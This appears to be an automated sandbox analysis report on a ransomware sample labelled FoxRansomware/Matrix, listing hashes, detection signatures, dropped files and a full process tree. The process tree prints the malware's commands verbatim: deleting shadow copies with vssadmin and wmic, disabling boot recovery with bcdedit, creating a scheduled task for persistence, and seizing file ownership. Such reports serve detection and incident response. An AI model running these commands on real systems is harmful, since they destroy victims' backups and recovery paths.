Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    03-04-2024 17:56

General

  • Target

    FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

  • Size

    1.2MB

  • MD5

    907636b28d162f7110b067a8178fa38c

  • SHA1

    048ae4691fe267e7c8d9eda5361663593747142a

  • SHA256

    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

  • SHA512

    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

  • SSDEEP

    24576:R/SA+2lraRrjSJR5ezmT1dM9tZBb5t+wb8fq/81mkvfW:3XlayIsy81hvf

Malware Config

Extracted

  • Language
    ps1
  • Deobfuscated URLs
    ps1.dropper: http://myexternalip.com/raw

Extracted

Path

C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf

Ransom Note
Emails
URLs

https://bitmsg.me

https://bitmsg.me/users/sign_up

https://bitmsg.me/users/sign_in

Signatures

  • Matrix Ransomware 64 IoCs

    Targeted ransomware with information collection and encryption functionality.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates connected drives 3 TTPs 44 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 2 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 47 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
    "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
    1⤵
    • Matrix Ransomware
    • Loads dropped DLL
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:2956
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe"
      2⤵
        PID:3024
      • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe" -n
        2⤵
        • Executes dropped EXE
        PID:2620
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xDmEPljO.txt"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:816
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1196
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\DjD57Lbc.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2164
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\DjD57Lbc.bmp" /f
          3⤵
          • Sets desktop wallpaper using registry
          PID:2192
        • C:\Windows\SysWOW64\reg.exe
          reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
          3⤵
            PID:2292
          • C:\Windows\SysWOW64\reg.exe
            reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
            3⤵
            • Matrix Ransomware
            PID:1328
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\S4Bfhqiw.vbs"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1076
          • C:\Windows\SysWOW64\wscript.exe
            wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\S4Bfhqiw.vbs"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:848
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat" /sc minute /mo 5 /RL HIGHEST /F
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:1940
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat" /sc minute /mo 5 /RL HIGHEST /F
                5⤵
                • Creates scheduled task(s)
                PID:1396
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
              4⤵
                PID:2412
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /Run /I /tn DSHCA
                  5⤵
                    PID:2968
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vvdIy2ke.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf""
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2396
              • C:\Windows\SysWOW64\attrib.exe
                attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                3⤵
                • Views/modifies file attributes
                PID:2620
              • C:\Windows\SysWOW64\cacls.exe
                cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf" /E /G Admin:F /C
                3⤵
                  PID:2696
                • C:\Windows\SysWOW64\takeown.exe
                  takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf"
                  3⤵
                  • Modifies file permissions
                  PID:1628
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c siPyPOvN.exe -accepteula "StandardBusiness.pdf" -nobanner
                  3⤵
                  • Loads dropped DLL
                  PID:2684
                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\siPyPOvN.exe
                    siPyPOvN.exe -accepteula "StandardBusiness.pdf" -nobanner
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:3008
                    • C:\Users\Admin\AppData\Local\Temp\siPyPOvN64.exe
                      siPyPOvN.exe -accepteula "StandardBusiness.pdf" -nobanner
                      5⤵
                      • Drops file in Drivers directory
                      • Sets service image path in registry
                      • Executes dropped EXE
                      • Enumerates connected drives
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: LoadsDriver
                      • Suspicious use of AdjustPrivilegeToken
                      PID:400
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {C331B2FD-1A46-4EA4-913B-687BD51A8ED0} S-1-5-21-406356229-2805545415-1236085040-1000:IKJSPGIM\Admin:Interactive:[1]
              1⤵
                PID:2208
                • C:\Windows\SYSTEM32\cmd.exe
                  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat"
                  2⤵
                    PID:2480
                    • C:\Windows\system32\vssadmin.exe
                      vssadmin Delete Shadows /All /Quiet
                      3⤵
                      • Interacts with shadow copies
                      PID:1596
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic SHADOWCOPY DELETE
                      3⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4720
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}
                      3⤵
                      • Drops file in System32 directory
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4836
                      • C:\Windows\system32\vssadmin.exe
                        "C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet
                        4⤵
                        • Interacts with shadow copies
                        PID:4936
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} recoveryenabled No
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:4956
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      3⤵
                      • Modifies boot configuration data using bcdedit
                      PID:2452
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN DSHCA /F
                      3⤵
                        PID:1912
                  • C:\Windows\system32\vssvc.exe
                    C:\Windows\system32\vssvc.exe
                    1⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3352

Network

MITRE ATT&CK Enterprise v15


Downloads

                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\#CORE_README#.rtf

                    Filesize

                    8KB

                    MD5

                    c78a812b37244fdba4738d13aef001cd

                    SHA1

                    083187f95aff0c19f2ee6325978109adc6284800

                    SHA256

                    e2e45c829aa25b74a95a2f62f6787a606167a3d86e731b13b28badae383631ae

                    SHA512

                    34299fc9aa1d017f53f0dcf3386669651d390fc87be144ba0eb40ff72204bdae1d41403ef23e736a0b74c2bfa6a16f054f37a0006661fe91dbaff1f613b741e7

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\elog_1D4DCBC40EDCDA61.txt

                    Filesize

                    54KB

                    MD5

                    663c777e56512a9ac65e8b83a3319853

                    SHA1

                    79864c5827cc00b84407be199224e596b5d1f98c

                    SHA256

                    d57ec49134e62064f77c5e58310746f7f182791d00d7787a01dc8e5121b3a8f4

                    SHA512

                    61834dc95216f36c46c041c4770316d20adce9fcfeaba433a5aeb7592a8da61eb19071f6c35be2cbb6ab5047d58f1e8875ed5fcc918f193b8651731bca2c1f15

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\siPyPOvN.exe

                    Filesize

                    181KB

                    MD5

                    2f5b509929165fc13ceab9393c3b911d

                    SHA1

                    b016316132a6a277c5d8a4d7f3d6e2c769984052

                    SHA256

                    0cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4

                    SHA512

                    c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\vvdIy2ke.bat

                    Filesize

                    246B

                    MD5

                    03d4331a2fb2e8d93b43d92cb80c08e6

                    SHA1

                    a4bc676e908ab495d0f93267c2c55ff0bcf54110

                    SHA256

                    a5bcd32243a5535ed075a02a2ead333c9fa83f2aaf91507993c8f7cd79873a42

                    SHA512

                    3d7bd0692a4e1b6af282a40f0a130b303f54093043a971f086ca5db2f59b546dbed4f25b56793c235a6460ca33ff7dc71e3099ace31aad1da0512ab4bb037f2f

                  • C:\Users\Admin\AppData\Local\Temp\FoxRansomware\xDmEPljO.txt

                    Filesize

                    16B

                    MD5

                    17d432845dc7cb55ac69d75cf72f7f5d

                    SHA1

                    7f3b6e6ab91b3a13c0611fe6e95befab691d5cc3

                    SHA256

                    a7cd0523e7aca4fd8db39d49ce1fe6198b92956509bd360dae646798c2a251a4

                    SHA512

                    25054cd4ec03675f28d0aa1aa09b691beacb9f9a1cf538179777d74a713e97457c39d56c787becc378fcdc31c62cbdf56546f8cee41f5f99f11b8798663104e0

                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2F3ZDOEROF46SOGSYIED.temp

                    Filesize

                    7KB

                    MD5

                    7fe2564e6c6df34b62af0561dd120e74

                    SHA1

                    83d02273db5e63b68fc77b3b8cbc34a0d57064b4

                    SHA256

                    5b5423faf0cd8535bdce9304109a9f2db38955d44a02607caaddb5d8f76b4072

                    SHA512

                    a3d3ee85ad093eb50ca74fb2307ce1fdd9ddfa7b8976420bfe7c17cf174aee892ce451bab39a154a9f005c95ad670c701ef06c621558dc54433e0fd45132603b

                  • C:\Users\Admin\AppData\Roaming\S4Bfhqiw.vbs

                    Filesize

                    260B

                    MD5

                    a65a07b2771a54a0735feaaed024ef53

                    SHA1

                    8a49732c332448824605f95183f15b73d9d0f022

                    SHA256

                    2089ead2fdc3d518e658a21595fad4146ed8ebfec393c1a9b5fca128f280727a

                    SHA512

                    96bfe06b713a69efeb440edbb4300fb2e2e333a9e6259098a1d59ba04ab0dc8e2c21be5f27747750c9fbcdac43c50d5013b303a46a20d0cb72f16a8c27abf0af

                  • C:\Users\Admin\AppData\Roaming\wOZ34oRR.bat

                    Filesize

                    415B

                    MD5

                    19ffd75c0310f1d123f4efa9b932022a

                    SHA1

                    c9ff4bee62ebd1db2d13476954ef77141a5c9c45

                    SHA256

                    1aa27aeafaf80320e2029ddd3beb14d6f34911cd48d81850ed6f2c6f9eac7191

                    SHA512

                    c08f18bab7c2d36ccc9f55f9303deeae5a37750bf722c7c81b91fa9f12b1965d1964c79079fa6e8a6e3261e1f0e58ce03eb2b54f8fdf75311d207b12145c063a

                  • \Users\Admin\AppData\Local\Temp\FoxRansomware\NWwSQgCp.exe

                    Filesize

                    1.2MB

                    MD5

                    907636b28d162f7110b067a8178fa38c

                    SHA1

                    048ae4691fe267e7c8d9eda5361663593747142a

                    SHA256

                    6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b

                    SHA512

                    501a7ee7fc8c0869d3cb57be3a75be02f6a17583e524fae9fa29e149a7391a5ed79c45143c09c667eed7d2fe217503121e23edd6f1bac47c8ba7ec7a4ecbe04a

                  • \Users\Admin\AppData\Local\Temp\siPyPOvN64.exe

                    Filesize

                    221KB

                    MD5

                    3026bc2448763d5a9862d864b97288ff

                    SHA1

                    7d93a18713ece2e7b93e453739ffd7ad0c646e9e

                    SHA256

                    7adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec

                    SHA512

                    d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6

                  • memory/1196-12-0x0000000073B90000-0x000000007413B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1196-13-0x0000000002650000-0x0000000002690000-memory.dmp

                    Filesize

                    256KB

                  • memory/1196-11-0x0000000073B90000-0x000000007413B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1196-16-0x0000000073B90000-0x000000007413B000-memory.dmp

                    Filesize

                    5.7MB

                  • memory/1196-14-0x0000000002650000-0x0000000002690000-memory.dmp

                    Filesize

                    256KB

                  • memory/2620-8-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/2684-14059-0x0000000000230000-0x00000000002A7000-memory.dmp

                    Filesize

                    476KB

                  • memory/2684-2237-0x0000000000230000-0x00000000002A7000-memory.dmp

                    Filesize

                    476KB

                  • memory/2956-15-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/2956-8701-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/2956-14056-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/2956-12272-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/2956-14724-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/2956-14795-0x0000000000400000-0x000000000053B000-memory.dmp

                    Filesize

                    1.2MB

                  • memory/3008-2307-0x0000000000400000-0x0000000000477000-memory.dmp

                    Filesize

                    476KB

                  • memory/4836-14741-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

                    Filesize

                    9.6MB

                  • memory/4836-14742-0x00000000027F0000-0x0000000002870000-memory.dmp

                    Filesize

                    512KB

                  • memory/4836-14744-0x00000000027F0000-0x0000000002870000-memory.dmp

                    Filesize

                    512KB

                  • memory/4836-14745-0x0000000002410000-0x0000000002418000-memory.dmp

                    Filesize

                    32KB

                  • memory/4836-14746-0x00000000027F0000-0x0000000002870000-memory.dmp

                    Filesize

                    512KB

                  • memory/4836-14748-0x000007FEF5070000-0x000007FEF5A0D000-memory.dmp

                    Filesize

                    9.6MB

                  • memory/4836-14740-0x000000001B300000-0x000000001B5E2000-memory.dmp

                    Filesize

                    2.9MB